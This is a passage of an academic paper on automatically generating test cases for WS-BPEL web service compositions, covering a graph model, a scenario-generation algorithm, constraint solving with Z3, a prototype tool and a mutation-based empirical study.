Your comments and questions are valued and encouraged. Contact the author at: Judy Loren Independent Consultant P. O. Box 306 Cumberland, ME 04021 JLoren@maine.rr.com
Automated Testing of WS-BPEL Service Compositions: A Scenario-Oriented Approach Chang-ai Sun, Member, IEEE, Yan Zhao, Lin Pan, Huai Liu, Member, IEEE, and Tsong Yueh Chen, Member, IEEE Abstract— Nowadays, Service Oriented Architecture (SOA) has become a mainstream paradigm for developing distributed applications. As the basic unit in SOA, Web services can be composed to construct complex applications. The quality of Web services and their compositions is critical to the success of SOA applications. Testing, as a major quality assurance technique, is confronted with new challenges in the context of service compositions. In this paper, we propose a scenario-oriented testing approach that can automatically generate test cases for service compositions. Our approach is particularly focused on the service compositions specified by Business Process Execution Language for Web Services (WS-BPEL), a widely recognized executable service composition language. In the approach, a WS-BPEL service composition is first abstracted into a graph model; test scenarios are then derived from the model; finally, test cases are generated according to different scenarios. We also developed a prototype tool implementing the proposed approach, and an empirical study was conducted to demonstrate the applicability and effectiveness of our approach. The experimental results show that the automatic scenario-oriented testing approach is effective in detecting many types of faults seeded in the service compositions. Index Terms—Service Oriented Architecture, service compositions, Business Process Execution Language for Web Services, scenario-oriented testing. 1 INTRODUCTION Service Oriented Architecture (SOA) [22] has been widely applied to the development of various distributed applications. Web services, the basic applications in SOA, are often developed and owned by a third party, and are published and deployed in an open and dynamic environment. 
A single Web service normally provides limited functionality, so multiple Web services are expected to be composed to implement complex and flexible business processes. The Business Process Execution Language for Web Services (WS-BPEL) [14] is a popular language for service compositions. In the context of WS-BPEL, all communications among Web services are via standard eXtensible Markup Language (XML) messages [35], which provides a sound solution to the challenging issues in a distributed and heterogeneous environment, such as data exchange and application interoperability. Moreover, thanks to their loose coupling, Web services inside service compositions can be easily replaced to cater for quickly changing business requirements and environments. However, ensuring the quality of such loosely coupled service compositions becomes difficult yet important. Testing is a practical and feasible approach to the quality assurance of service-based systems [4], [27]. It mainly involves two aspects, namely testing individual Web services and testing service compositions. The former is usually done by service developers, and many testing techniques are available [21], [29], [25], while the latter is left to service consumers and corresponds to integration testing. However, service composition testing is greatly different from traditional integration testing in two respects. First, Web services are developed and tested independently, so it is hard for service developers to anticipate all possible usage scenarios. Second, services within compositions are usually abstract ones and are only bound to concrete Web services at run-time. This run-time binding delays the execution of testing and calls for on-the-fly testing techniques. In this context, traditional integration testing techniques are not applicable.
In previous work [26], [30], [39], a model-based approach was proposed for automatically generating a set of test scenarios from UML activity diagram specifications. With this approach, testers can test on demand the corresponding programs whose behaviors are described by UML activity diagrams. WS-BPEL specifications are by nature very similar to UML activity diagram specifications, because both are based on state machines and provide mechanisms for supporting concurrent control flows. Unlike UML activity diagram specifications, however, WS-BPEL specifications are executable programs rather than workflow models. In this paper, based on our recent study [28], we propose an automatic scenario-oriented testing approach for WS-BPEL service compositions. This approach leverages the previous work [26], [30], [39] on testing UML activity diagrams in the context of SOA, and addresses the challenges of testing loosely coupled and run-time-bound service compositions. In our approach, an abstract test model is first defined to represent WS-BPEL processes. Then, test scenarios are generated from the test model with respect to the given coverage criteria. Finally, test data are generated and selected to drive the execution of test scenarios. However, in the preliminary study, the approach, especially the final step of test case generation, was not fully automated. In this paper, we not only present the basic ideas of the approach, but also propose novel techniques for fully automating it. We also developed a prototype tool that implements the proposed approach in the SOA environment. (This article has been accepted for publication in a future issue of IEEE Transactions on Services Computing, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/TSC.2015.2466572.)
In addition, an empirical study has been conducted to demonstrate our approach and validate its applicability and effectiveness. The main contributions of this paper, together with its preliminary version [28], are threefold: (i) we propose a scenario-oriented testing framework for WS-BPEL service compositions, including a graph model for WS-BPEL specifications, a set of mapping rules and an algorithm for converting WS-BPEL specifications into the graph model, an algorithm for generating test scenarios with respect to a specific criterion, and a constraint-based technique for test data generation; (ii) we develop a tool to automate the proposed scenario-oriented testing framework and algorithms; and (iii) we validate the feasibility of the proposed approach and evaluate its fault-detection effectiveness via an empirical study.

The rest of the paper is organized as follows. Section 2 introduces underlying concepts related to WS-BPEL, scenario-oriented testing, and constraint solving techniques. Section 3 proposes the scenario-oriented testing approach for WS-BPEL service compositions. Section 4 describes our prototype tool. Section 5 describes an empirical study where the proposed approach is used to test two real-life WS-BPEL service compositions. The experimental results are discussed in Section 6. Section 7 discusses related work. Section 8 concludes the paper and outlines future work.

2 BACKGROUND

In this section, we introduce the underlying concepts and techniques of the proposed approach.

2.1 Business Process Execution Language for Web Services (WS-BPEL)

For a service-based system, a bundle of Web services needs to be coordinated, and each service is expected to execute its predefined functionalities. There are two representative ways of achieving such coordination, namely orchestration and choreography [22]. Of the two, orchestration is more widely recognized and adopted in practice.
WS-BPEL is an executable service composition language which specifies business processes by orchestrating Web services, and exports the process as a composite Web service described by the Web Service Description Language (WSDL [34]). In this way, an individual WS-BPEL process can be used as a basic service unit participating in more complex business processes. A WS-BPEL process often consists of four sections, namely partner link statements, variable statements, handler statements, and interaction steps. Activities are the basic interaction units of WS-BPEL processes, and are further divided into basic activities and structural activities. Basic activities execute an atomic execution step; they include assign, invoke, receive, reply, throw, wait, empty, and so on. Structural activities are composites of basic activities and/or structural activities; they include sequence, switch, while, flow, pick, and so on. WS-BPEL has standard control structures, such as sequence, switch, and while. In addition, WS-BPEL provides concurrency among activities via flow activities and synchronization via link tags within flows. Each link has a source activity and a target activity. A transition condition, which is an XPath Boolean expression, can be associated with a link. A transition can happen only when the associated condition is satisfied, that is, the target activity is executed after completion of the source activity. If transition conditions are not explicitly specified, their default values are true, indicating that the target activity will always be performed after executing the source activity. If an activity is the target activity of multiple links, the activity should have an associated join condition, and only when all the incoming links are defined and its join condition is true can the activity be enabled. Otherwise, if the join condition is false, the activity is not executed and the effect is propagated downstream to the subsequent activities.
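As a schematic illustration of the link mechanism described above, the following fragment (WS-BPEL 2.0 element names; partner links, port types, and the other attributes that a deployable process needs are omitted, and the activity and variable names are hypothetical):

```xml
<flow>
  <links>
    <link name="stockChecked"/>
  </links>
  <!-- Source activity: when it completes, the link's status is set by
       evaluating the transition condition. -->
  <invoke name="CheckWarehouse" operation="checkStock">
    <sources>
      <source linkName="stockChecked">
        <transitionCondition>$stockResponse.amount &gt;= $order.amount</transitionCondition>
      </source>
    </sources>
  </invoke>
  <!-- Target activity: enabled only after the incoming link fires and
       the join condition evaluates to true. -->
  <invoke name="RequestShipping" operation="ship">
    <targets>
      <joinCondition>$stockChecked</joinCondition>
      <target linkName="stockChecked"/>
    </targets>
  </invoke>
</flow>
```

If the transition condition evaluates to false, the link status is false, the join condition of `RequestShipping` fails, and the effect propagates downstream exactly as the text describes.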
Through the flow and link structure, WS-BPEL provides a “multiple-choice” style workflow pattern [32], and multiple outgoing flows may be enabled simultaneously, representing concurrent behaviors.

2.2 Scenario-oriented testing

From the workflow point of view, the functionalities of a system can be described as a set of scenarios. A scenario usually represents an execution path of a software system. In this sense, one needs to first derive a set of possible test scenarios and then execute these scenarios with test data and observe their behaviors. Test data associated with a specific test scenario can be derived by analyzing and solving the conditions along the associated path. If the execution of a scenario does not happen as expected, then a fault is detected. WS-BPEL provides the mechanism to specify concurrent behaviors in workflows. This feature gives rise to new challenges when testing service compositions with concurrent behavior. First, concurrent behaviors are nondeterministic and thus difficult to reproduce. Second, the concurrency mechanism introduces nonstructural elements, which are more difficult to test than common control flows. Finally, comprehensive testing of concurrent behaviors significantly increases the number of possible test scenarios. To decide to what extent concurrent elements should be tested, Sun [26] has proposed the following three coverage criteria:

- Weak concurrency coverage. Test scenarios are derived to cover only one feasible sequence of parallel processes, without considering the interleaving of activities between parallel processes.
- Moderate concurrency coverage. Test scenarios are derived to cover all the feasible sequences of parallel processes, without considering the interleaving of activities between parallel processes.
- Strong concurrency coverage. Test scenarios are derived to cover all feasible sequences of activities and parallel processes.
Although these test coverage criteria were first proposed for concurrency testing in general, they are applicable to testing concurrent behaviors in WS-BPEL programs. All these test coverage criteria require covering each parallel activity at least once. Among them, the weak and moderate coverage criteria require the parallel activities to be tested in a sequential way, while the strong coverage criterion, which considers all possible combinations of activities and transitions, is usually impractical due to its huge cost.

2.3 Constraint solving techniques

Constraint solving techniques enable applications such as extended static checking, predicate abstraction, test case generation, and bounded model checking [7]. In particular, constraint solving plays an important role in test case generation for the purpose of coverage or of verifying a particular type of property, such as bug finding and vulnerability detection [41]. Furthermore, constraint solver-based testing tools enable more precise analysis with the ability to generate bug-revealing inputs. Over the past decade, researchers have developed a variety of constraint solvers [18]. Among them, Z3 [7] is one of the most powerful constraint solvers, with support for linear real and integer arithmetic, fixed-size bit-vectors, uninterpreted functions, extensional arrays, quantifiers, multiple input formats, and extensive APIs (including C/C++/.NET/Java/Python APIs). Z3-str [41] is an extension of Z3 supporting combined logics over string and non-string operations. It supports three sorts of terms: (i) string-sorted terms, including string constants and variables of arbitrary length; (ii) integer-sorted terms, which are standard, with the exception of the length function over string terms; and (iii) Boolean operators, which combine atomic formulas that are equations over string terms and equalities or inequalities over integer terms.
In this paper, we leverage advances in constraint solvers and use Z3 and Z3-str as constraint solvers to generate the relevant input values of a path condition, as discussed later.

3 Scenario-Oriented Testing for WS-BPEL Service Compositions

The proposed scenario-oriented testing approach for WS-BPEL service compositions is sketched in Figure 1. In the context of WS-BPEL specifications, a test scenario corresponds to a set of activities and transitions. The number of test scenarios can be huge when service compositions are complex. One key issue is how to generate a set of test scenarios according to a certain coverage criterion. Furthermore, WS-BPEL service compositions may be subject to frequent changes in order to cater for quickly changing business requirements and dynamic environments. It can be very tedious and difficult to generate test scenarios manually, especially for large and complex WS-BPEL compositions. Therefore, scenario-oriented testing of service compositions should be automated as much as possible. In this section, we elaborate the main steps of our approach and show how the above-mentioned issues are addressed when applying the approach to WS-BPEL programs.

3.1 WS-BPEL Graph Model (BGM)

WS-BPEL programs are represented as XML files, which differ greatly in syntax from programs written in traditional programming languages, such as C or Java. On the other hand, WS-BPEL programs are well structured and hence can be easily analyzed by means of available XML analysis techniques, such as the Document Object Model (DOM) [33] and the Simple API for XML (SAX) [24]. When we generate test scenarios from WS-BPEL programs, only those elements defined in the interaction section matter, and thus we can skip over the elements defined in the partner link, variable, and handler sections. Furthermore, we can also skip over those attributes of an activity that make no contribution to the construction of test scenarios.
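This kind of structural filtering can be sketched with the standard DOM API. The toy document below is a simplified, non-namespaced stand-in for a real WS-BPEL file, and the section names in `SKIP` are only the ones mentioned above:

```python
from xml.dom.minidom import parseString

# A toy WS-BPEL-like document (structure heavily simplified for illustration;
# real WS-BPEL documents are namespace-qualified).
BPEL = """<process name="SupplyChain">
  <partnerLinks><partnerLink name="retailer"/></partnerLinks>
  <variables><variable name="order"/></variables>
  <sequence>
    <receive name="receiveInput"/>
    <invoke name="warehouse"/>
    <reply name="reply"/>
  </sequence>
</process>"""

SKIP = {"partnerLinks", "variables", "faultHandlers"}  # non-interaction sections

def interaction_activities(doc):
    """Collect activity element names, skipping partner link, variable,
    and handler sections, in document (depth-first) order."""
    result = []
    def walk(node):
        for child in node.childNodes:
            if child.nodeType != child.ELEMENT_NODE:
                continue
            if child.tagName in SKIP:
                continue
            result.append(child.tagName)
            walk(child)
    walk(doc.documentElement)
    return result

acts = interaction_activities(parseString(BPEL))
# → ['sequence', 'receive', 'invoke', 'reply']
```

Only the `sequence` subtree survives the filter, which is exactly the input the BGM construction needs.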
To make the testing task simple and effective, we first define an abstract test model called the WS-BPEL Graph Model (BGM), which only considers activities and their relationships within WS-BPEL specifications. The objective of BGM is two-fold. First, one can use it to convert a complex WS-BPEL program into a simple graph, which is formal and easy to analyze. Second, it abstracts activities with similar semantics into a single node type, thus reducing the number of control structure types. For example, both the switch and pick types are used to specify optional control logic, and they share the same notation in BGM. The BGM of a WS-BPEL program is an extended graph \[ \text{BGM} = \langle \text{Nodes}, \text{Edges} \rangle. \] A node in \(\text{Nodes}\) corresponds to a WS-BPEL activity and is represented as an entry \[ < \text{id}, \text{responseid}, \text{outing}, \text{type}, \text{name} >, \] where

- **id** is the unique identification of an activity. It starts from zero, and the activities inside optional or parallel activities are labeled in a depth-first way.
- **outing** refers to the number of subsequent activities of the current activity.
- **type** refers to the type of the current activity. Node types in BGM are summarized in Table 1.

Table 1. Node types in BGM

<table> <thead> <tr> <th>Node type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>initial</td> <td>The beginning of interactions</td> </tr> <tr> <td>end</td> <td>The end of interactions</td> </tr> <tr> <td>action</td> <td>A normal activity</td> </tr> <tr> <td>branch</td> <td>The beginning of an optional activity</td> </tr> <tr> <td>merge</td> <td>The end of an optional activity</td> </tr> <tr> <td>fork</td> <td>The beginning of parallel activities</td> </tr> <tr> <td>join</td> <td>The end of parallel activities</td> </tr> <tr> <td>cycle</td> <td>A loop activity</td> </tr> </tbody> </table>

1. In this paper, we use WS-BPEL compositions and WS-BPEL programs interchangeably.
- **name** refers to the name of the current activity.
- **responseid** is used to identify the hierarchy of WS-BPEL activities. The definitions of **responseid** for the different node types are further explained as follows.
  - **responseid** of an **action** or **initial** node denotes the next non-normal node;
  - **responseid** of a **branch** node denotes its matching **merge** node;
  - **responseid** of a **fork** node denotes its matching **join** node;
  - **responseid** of a **merge** or **join** node denotes the next node after the **merge** or **join** node, respectively;
  - **responseid** of an **end** node denotes itself;
  - **responseid** of a **cycle** node denotes itself.

An edge in **Edges** corresponds to a transition in WS-BPEL and is represented as an entry \(< iID, oID >\), where

- **iID** refers to the **ID** of the incoming activity of the transition;
- **oID** refers to the **ID** of the outgoing activity of the transition.

### 3.2 Conversion of WS-BPEL programs into BGM

We first classify the activities of WS-BPEL specifications into five types. Among them, normal activities are basic activities, while the others are structural activities.

- **Normal** activities are atomic execution units.
- **Sequential** activities execute their child activities in sequential order; examples are the **sequence** and **scope** activities.
- **Optional** activities execute only one branch of their child activities; examples are the **switch**, **if/else if/else**, and **pick** activities.
- **Loop** activities execute their child activities repeatedly until some condition is met.
- **Parallel** activities execute their child activities simultaneously; an example is the **flow** activity.

In order to convert WS-BPEL specifications into BGMs, we define a set of mapping rules with respect to each type of WS-BPEL activity, as follows.
- **Normal** activities are directly mapped to **action** nodes.
- For **sequential** activities, a sequence of nodes is created, each node corresponding to a child activity; meanwhile, an edge is added between each pair of adjacent nodes.
- **Optional** activities are mapped to **branch-merge** node pairs, and each branch is mapped to a child node.
- For **loop** activities, their child activities are mapped to a sequence of nodes, and a **cycle** node is added at the end, whose outgoing edges point to the first node in the loop and the first node after the loop.
- **Parallel** activities support concurrency via flows in WS-BPEL. Child activities without source or target elements are executed in parallel. In this context, the `<flow></flow>` pairs are mapped to **fork-join** node pairs, and each parallel branch is mapped to a child node of the **fork** node and a parent node of the **join** node. For those child activities that have source and target elements within the flows, transitions are enabled depending on whether the links' conditions are satisfied.

Fig. 2. Illustration of mapping rules

Figure 2 illustrates these mapping rules. Note that for the structural activities (sequential, optional, loop, and parallel), the child activities can be either basic or structural activities. The mapping rules discussed above can be applied recursively. Based on these mapping rules, we propose a recursive conversion algorithm (Algorithm 1), which can be used to automatically convert a WS-BPEL program into a BGM. The proposed algorithm first gets the number of top-level activities of the current WS-BPEL program, and then converts each activity according to its type. The conversions are conducted following the above-mentioned mapping rules. The algorithm is able to convert complex and nested structural activities. Its time complexity is proportional to...
### 3.3 Generation of test scenarios based on BGM

The abstract BGM provides a formal test model on the basis of which we can easily define algorithms to automatically generate test scenarios with respect to a given coverage criterion. As an illustration, we propose Algorithm 2 to generate test scenarios from a BGM with respect to the weak concurrency coverage discussed in Section 2.2.

Algorithm 2 WeakCoverage(Node start, Node end): generating test scenarios from a BGM G with respect to weak concurrency coverage

1: if start ≠ end then
2:   if start.type = “action” then
3:     tmpPaths ← WeakCoverage(start.afterNodes.get(0), end)
4:     Add start node to each path in tmpPaths
5:     return tmpPaths
6:   end if
7:   if start.type = “branch” or start.type = “fork” then
8:     node ← getResponseNode(start.responseid)
9:     for all i = 1, 2, ..., start.afterNodes.size() do
10:      tmp[i] ← WeakCoverage(start.afterNodes.get(i), node)
11:    end for
12:    tmpPaths ← WeakCoverage(node.afterNodes.get(0), end)
13:    Merge tmp[] and tmpPaths into resultPaths
14:    return resultPaths
15:  end if
16:  if start.type = “cycle” then
17:    startNode ← the first node in the loop
18:    endNode ← the last node in the loop
19:    tmpPaths1 ← WeakCoverage(startNode, endNode)
20:    tmpNode ← the first node after the loop
21:    tmpPaths2 ← WeakCoverage(tmpNode, end)
22:    Merge tmpPaths1 and tmpPaths2 into resultPaths
23:    return resultPaths
24:  end if
25: else
26:   Add start node to resultPaths
27:   return resultPaths
28: end if

The algorithm generates test scenarios from a start node to an end node recursively. In the first round, the start node corresponds to the initial node and the end node corresponds to the end node of a BGM. After that, a start node and an end node form a segment of the BGM, and partial test scenarios are generated according to the types of nodes:

- If the start node is a branch node or a fork node, the BGM segment is divided into two parts. One is from the start node (namely the branch or fork node) to the corresponding response node (namely the merge or join node), which can be identified by means of its responseid; the other is from the first node after the corresponding response node to the end node. The algorithm generates a partial test scenario for each part and then combines them to form the complete test scenario.
- If the start node is a cycle node, the BGM segment is also divided into two parts. One is from the first node in the loop to the last node in the loop; the other is from the first node after the loop to the end node. The algorithm generates a partial test scenario for each part and combines them to form the complete test scenario.
- If the start node is the end node, it means that all nodes have been handled, and the start node is added to the generated test scenarios.

The proposed algorithm traverses each node once, so its time complexity is proportional to the number of nodes, that is, $O(n)$ where $n$ denotes the number of nodes in the BGM.

Fig. 3. The resulting BGM for the SupplyChain service composition

When the algorithm is applied to the BGM shown in Fig. 3, two test scenarios are generated: (i) ‘initial’→‘receiveInput’→‘warehouse’→‘branch’→‘Shipper’→‘Assign’→‘Merge’→‘reply’→‘end’; and (ii) ‘initial’→‘receiveInput’→‘warehouse’→‘branch’→‘Assign’→‘Merge’→‘reply’→‘end’.

### 3.4 Constraint-based test case generation

Scenario-oriented testing is actually a path-sensitive testing approach that traverses program paths in a depth-first way. For each program path, a set of constraints on the program's inputs is generated. The conjunction of those constraints is called a path condition, which is used to avoid infeasible paths. The constraints are of various kinds: Boolean constraint satisfaction problems (e.g. "A or B is true"), linear arithmetic constraints solvable by the simplex algorithm (e.g.
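The branch/merge case of the recursion can be sketched in Python. This is a minimal illustration that handles only action and branch/merge nodes (no fork/join or cycle); node names follow the SupplyChain scenarios listed above, with the two distinct assign activities disambiguated as `Assign1`/`Assign2`:

```python
from dataclasses import dataclass, field

@dataclass
class Node:
    type: str                                  # "initial", "action", "branch", "merge", "end"
    succ: list = field(default_factory=list)   # ids of successor nodes
    responseid: str = ""                       # for a branch node: id of its matching merge node

def weak_coverage(bgm, start, end):
    """Return one scenario per optional branch (weak coverage; no fork/cycle here)."""
    if start == end:
        return [[start]]
    node = bgm[start]
    if node.type == "branch":
        merge = node.responseid
        after_merge = bgm[merge].succ[0]       # first node after the merge node
        tails = weak_coverage(bgm, after_merge, end)
        paths = []
        for branch_head in node.succ:          # one partial scenario per branch
            for inner in weak_coverage(bgm, branch_head, merge):
                for tail in tails:
                    paths.append([start] + inner + tail)
        return paths
    return [[start] + p for p in weak_coverage(bgm, node.succ[0], end)]

bgm = {
    "initial":      Node("initial", ["receiveInput"]),
    "receiveInput": Node("action",  ["warehouse"]),
    "warehouse":    Node("action",  ["branch"]),
    "branch":       Node("branch",  ["Shipper", "Assign2"], responseid="Merge"),
    "Shipper":      Node("action",  ["Assign1"]),
    "Assign1":      Node("action",  ["Merge"]),
    "Assign2":      Node("action",  ["Merge"]),
    "Merge":        Node("merge",   ["reply"]),
    "reply":        Node("action",  ["end"]),
    "end":          Node("end"),
}

scenarios = weak_coverage(bgm, "initial", "end")
# two scenarios: one through Shipper→Assign1, one directly through Assign2
```

The recursion mirrors the two-part split described above: each branch is explored up to the matching merge node, and the partial scenario from the node after the merge to the end is appended to every branch path.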
"$x \leq 5"$), and others. Typically, there are three methods for generating test data for a specific program path [40], namely (i) symbolic execution is a method of analyzing a program to determine what inputs cause each part of a program to execute; this method assumes symbolic values for inputs rather than concrete inputs as normal execution of the program would; (ii) genetic algorithm searches the possible inputs by means of heuristic that mimics the process of natural selection, such as inheritance, mutation, selection, and crossover; and (iii) constraint solving. Among these methods, symbolic execution is a static approach and mainly suitable for solving linear paths, while genetic algorithm is a dynamic approach requiring the execution of a program multiple times and hence very time-consuming. Based on the above observations, we employ constraint solving to generate test data for a specific program path, and particularly select Z3 [6] as constrain solver. The process of constraint-based test case generation is illustrated in Figure 4. Firstly, the path conditions are identified for each test scenario. Secondly, test data are generated according to the path conditions via constraint solver. Finally, test suites are constructed based on the test data. The details how to automate each step are given in the following. • Identification of path conditions: To identify the path condition of a specific test scenario, we need to extract constraints that have to be satisfied in order to run the scenario. In the context of WS-BPEL, branch statements (such as “switch”, “if”, “elseif”, and “else”) and cycle statements (such as “while”, “repeatUntil” and “forEach”) are supported; all conditions of branch or cycle nodes on the path are extracted and combined to form an expression of the path conditions. Since WS-BPEL programs are represented as well-structured XML files, the extraction of node’s information required in BGM is eased via XML DOM. 
If the condition part of a branch or cycle node in the test scenario is not empty, it is added to the path condition.

• Generation of test data: As mentioned before, a WS-BPEL program is implemented as a composite Web service, commonly described by a WSDL file, which clearly declares the signatures of the operations supported by the Web service. Thus, one can know the input requirements of a WS-BPEL program by analyzing its WSDL description. It is tedious and time-consuming to manually generate test data that satisfy the path conditions. In this study, we turn to the constraint solver Z3 to automatically generate test data according to the expressions of path conditions. To do that, we first convert the path condition expression into variables that Z3 can accept. During this step, we also simplify the expression to remove redundant or irrelevant variables. Next, we set the value range of each input variable by analyzing the WS-BPEL program. Finally, the Z3 solver is executed to obtain concrete values within the range. Test data are then constructed by composing the concrete values of all variables in the expression.

• Construction of test suite: A test case consists of a test scenario and its associated test data. Since test data can be generated for each test scenario, a complete test suite can be constructed by generating test data for all test scenarios of the WS-BPEL program.

4 Prototype Tool

We have developed a prototype tool to automate all the steps of test case generation in the proposed approach. It has the following main features: (i) automatic generation of a set of test scenarios with respect to a coverage criterion; (ii) automatic generation of a scenario-oriented test suite whose size is adjustable. Furthermore, it provides an integrated test execution and verification mechanism for WS-BPEL programs: it aids the execution of the WS-BPEL program with generated test cases and the verification of each test by comparing actual outputs with expected ones.
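The paper's tool delegates this step to Z3; the contract it fulfils (find values inside declared ranges that satisfy a path condition, or report the path infeasible) can be sketched with a self-contained brute-force stand-in. The variable names and ranges below are hypothetical:

```python
from itertools import product

def solve(path_condition, ranges):
    """Return one assignment over the declared ranges satisfying the path
    condition, or None if the path is infeasible within those ranges.
    (Z3 plays this role in the actual tool; exhaustive search is only
    an illustration of the same interface.)"""
    names = list(ranges)
    for values in product(*(ranges[n] for n in names)):
        env = dict(zip(names, values))
        if path_condition(env):
            return env
    return None

# Path condition for the "stock is enough" SupplyChain scenario
# (variable names are made up for the example).
cond = lambda e: 0 < e["AmountProduct"] <= e["stock"]

data = solve(cond, {"AmountProduct": range(0, 20), "stock": range(0, 20)})
# → {"AmountProduct": 1, "stock": 1}
```

A real solver finds a model without enumerating the search space, which is what makes the approach scale beyond toy ranges.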
The tool was developed in Java and its implementation consists of about 3500 lines of code. Figure 5 depicts the architecture of the tool. The tool consists of three main components, namely Test Scenario Generation, Test Data Generation, and Execution and Verification. Inside Test Scenario Generation, the BPEL Parser is responsible for parsing WS-BPEL programs; the Converter converts WS-BPEL programs into BGMs, implementing the mapping rules in Section 3.2; the Scenario Generator implements the algorithms for generating test scenarios with respect to the given concurrency coverage criteria. Inside Test Data Generation, the WSDL Parser is responsible for parsing the WSDL descriptions of WS-BPEL programs; the Path Analyzer is responsible for constructing the path conditions of test scenarios; the Data Generator is responsible for generating, based on path conditions, test data which can drive the execution of the given test scenarios, and its implementation is based on the integration of Z3. Inside Execution and Verification, the Proxy is responsible for executing tests using the test suite, and is implemented by integrating ActiveBPEL, a well-recognized WS-BPEL engine [1]; the Verifier is responsible for verifying test results against expected outputs and producing a test report. Note that the prototype was developed based on the general WS-BPEL standard and thus is not restricted to specific WS-BPEL systems. To equip the prototype with good adaptability, an interface was reserved to further integrate Apache ODE [2], an open source WS-BPEL engine. More details on the tool are available in [40]. This prototype tool was used in the experiments that evaluate the fault-detection effectiveness of the proposed approach, described next.

Fig. 5.
The architecture of the prototype tool

### 5 Empirical Study

In this section, we report on an empirical study in which two real-life WS-BPEL programs were used as subject programs, mutation analysis was applied to quantitatively measure the fault-detection effectiveness, and the tool mentioned above was used to aid the experiments.

#### 5.1 Research Questions

In this study, we attempt to answer the following questions.

- **RQ1**: Is the proposed scenario-oriented approach applicable to WS-BPEL programs? In this study, we selected two representative real-life WS-BPEL programs as subject programs, and used the proposed approach and prototype tool to test these two programs.
- **RQ2**: How effective is the proposed scenario-oriented approach in detecting faults in WS-BPEL programs? Fault-detection effectiveness is a major metric for evaluating a testing method. Normally, the more faults a testing method can detect, the more effective it is. In this study, we evaluate the fault-detection effectiveness of the scenario-oriented approach via mutation analysis [8].
- **RQ3**: Is the proposed approach better than random testing? In this study, we compare the fault-detection effectiveness of the proposed approach with that of random testing, which is widely adopted in practice.

#### 5.2 Subject programs

SupplyChain [5] is a WS-BPEL process in a supply chain management system. Figure 6 illustrates its flowchart labeled with the statement identifiers. It receives three input messages from customers, namely NameProduct, AmountProduct, and WarehouseResponse. The Customer sends the Retailer a booking request, based on which the Retailer sends the Warehouse a supply request. The Warehouse will respond to the Retailer according to the stock.
After receiving the response, the Retailer reacts as follows: if the Warehouse replies “yes” (that is, the stock is enough), the Retailer will send a shipping request to the Shipper, who will then confirm by sending “yes” to the Retailer; if the Warehouse replies “no” (that is, the stock is not enough), the Retailer will send the Customer the message “Warehouse cannot receive the bill” and cancel the booking. The WS-BPEL service composition for SupplyChain is relatively simple, involving three Web services.

Fig. 6. The BPEL flowchart of the SupplyChain process

SmartShelf [17] receives an input message called commodity, which is composed of three fields, namely name, amount, and status. The process returns an output message which is composed of quantity, location, and status. Figure 7 illustrates its flowchart labeled with the statement identifiers. After receiving the input message, the process compares it with the available shelf items and decides whether the amount, location, and status of the available items meet the expected requirements. If the amount of available goods on the shelf is larger than the amount of the commodity, the quantity field of the message is “Quantity is enough”; otherwise, it transfers goods from the warehouse. If the amount of available goods in the warehouse is larger than the amount of the commodity, the quantity field of the message is “Quantity is not enough”. If the name of the commodity is not the same as the name of the available goods on the shelf, it rearranges the goods and returns “Rearrange is done” as the location field of the message; otherwise it returns “Location is OK”. If the status of the commodity is larger than the available status of the shelf, it sends the status to the warehouse and returns “Status is fine now” as the status field of the message; otherwise, it returns “Status is ok”. The above comparisons are done in parallel. The WS-BPEL service composition for SmartShelf is complex and involves interactions among 14 Web services.
It behaves as a typical concurrent program and is hence very representative.

5.3 Mutant generation

Mutation analysis [8] is widely used to assess the adequacy of a test suite and the effectiveness of testing techniques. It applies mutation operators to seed various faults into the program under test, generating a set of variants, namely mutants. If a test case causes a mutant to exhibit behavior different from that of the program under test, the mutant is said to be “killed”. In this study, we employ mutation analysis to validate the effectiveness of our approach. Though a set of mutation operators has been proposed for WS-BPEL service compositions [9], [11], [12], only five types of mutation operators were applicable and thus selected in our experiments: ERR refers to “replacing a relational operator by another of the same type”, AIE refers to “removing an else if element or an else element of an activity”, ACI refers to “changing the value of the createInstance attribute from ‘yes’ to ‘no’”, ASF refers to “replacing a sequence activity by a flow activity”, and ASI refers to “exchanging the order of two sequence child activities”. In this study, we manually seeded faults into the WS-BPEL programs, because no practical tool for this purpose existed when we started this work. For SupplyChain, we generated 11 mutants in total, while 26 mutants were generated for SmartShelf. These mutants are summarized in Appendix A. Note that among the 26 mutants for SmartShelf, mutant #22 is equivalent to the base program (that is, it always shows the same behavior as the base program), and is thus excluded from the experiment.

5.4 Variables and measures

5.4.1 Independent variables

The independent variable in our experiment is the test case generation technique. A natural choice for this variable is our scenario-oriented test case generation technique for WS-BPEL service compositions, as described in Section 3.
In addition, we used a random testing method as the baseline technique for comparison. In the random testing method, the input parameters are first identified for each program; next, a value range is defined for each input parameter; a concrete value is then randomly generated from the corresponding value range according to the uniform distribution; finally, a test case is constructed by combining the random values.

5.4.2 Dependent variables

We employ two metrics, namely mutation score (MS) and fault discovery rate (FDR), to measure the effectiveness of our approach. MS is defined as

$$\text{MS}(p, TS) = \frac{N_k}{N_m - N_e},$$

where $p$ refers to the program under test, $TS$ refers to the test suite used for testing the mutants, $N_k$ refers to the number of mutants killed by $TS$, $N_m$ refers to the total number of generated mutants, and $N_e$ refers to the number of equivalent mutants. MS intuitively indicates the capability of a test suite to kill mutants: the larger the MS, the more effective the test suite is in killing mutants for the given program.

FDR is defined as

$$\text{FDR}(m, TS) = \frac{N_f}{N_{TS}},$$

where $m$ refers to a certain mutant, $TS$ refers to the test suite, $N_f$ refers to the number of test cases that can kill $m$, and $N_{TS}$ refers to the total number of test cases in $TS$. Intuitively speaking, FDR indicates how effective a test suite is in killing a certain mutant: the larger the FDR, the more effective the test suite is in killing the given mutant.

5.5 Experiment Environment

The experiments were conducted on 64-bit MS Windows 7 with a dual 2.30 GHz processor and 2 GB of memory. All Web services were implemented in the Java language. WS-BPEL programs were developed using Eclipse 4.3.0 and deployed on Apache Tomcat 5.5.33. The prototype tool is based on Z3 4.3.0 for 64-bit Windows and ActiveBPEL 5.0.2.
5.6 Test case generation and data collection

